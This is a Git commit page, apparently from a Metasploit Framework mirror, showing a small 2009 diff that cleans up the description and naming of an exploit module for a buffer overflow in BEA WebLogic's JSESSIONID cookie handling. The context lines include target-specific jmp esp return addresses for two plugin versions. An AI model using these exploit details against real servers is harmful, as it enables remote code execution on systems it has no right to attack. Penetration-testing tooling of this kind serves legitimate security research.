infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

minor cleanups, removed 0day text, Fixes #573 

git-svn-id: file:///home/svn/framework3/trunk@7646 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2009-11-30 18:42:00 +00:00
parent 16ae0112d1
commit ec45ea8c22
1 changed files with 6 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
modules/exploits/windows/http/bea_weblogic_jsessionid.rb
View File

@ -14,9 +14,11 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => 'BEA Weblogic JSESSIONID cookie value overflow', 'Name' => 'BEA WebLogic JSESSIONID Cookie Value Overflow',
'Description' => %q{ 'Description' => %q{
This module exploits a 0day in the JSESSION cookie value when clustering is configured. This module exploits a buffer overflow in BEA's WebLogic plugin. The vulnerable
code is only accessible when clustering is configured. A request containing a
long JSESSION cookie value can lead to arbirtary code execution.
}, },
'Author' => 'pusscat', 'Author' => 'pusscat',
'References' => 'References' =>
@ -39,12 +41,12 @@ class Metasploit3 < Msf::Exploit::Remote
}, },
'Targets' => 'Targets' =>
[ [
[ 'Windows Apache 2.2 - weblogic module version 1.0.1136334', [ 'Windows Apache 2.2 - WebLogic module version 1.0.1136334',
{ {
'Ret' => 0x1006c9b5, # jmp esp 'Ret' => 0x1006c9b5, # jmp esp
} }
], ],
[ 'Windows Apache 2.2 - weblogic module version 1.0.1150354', [ 'Windows Apache 2.2 - WebLogic module version 1.0.1150354',
{ {
'Ret' => 0x1006c9be, # jmp esp 'Ret' => 0x1006c9be, # jmp esp
} }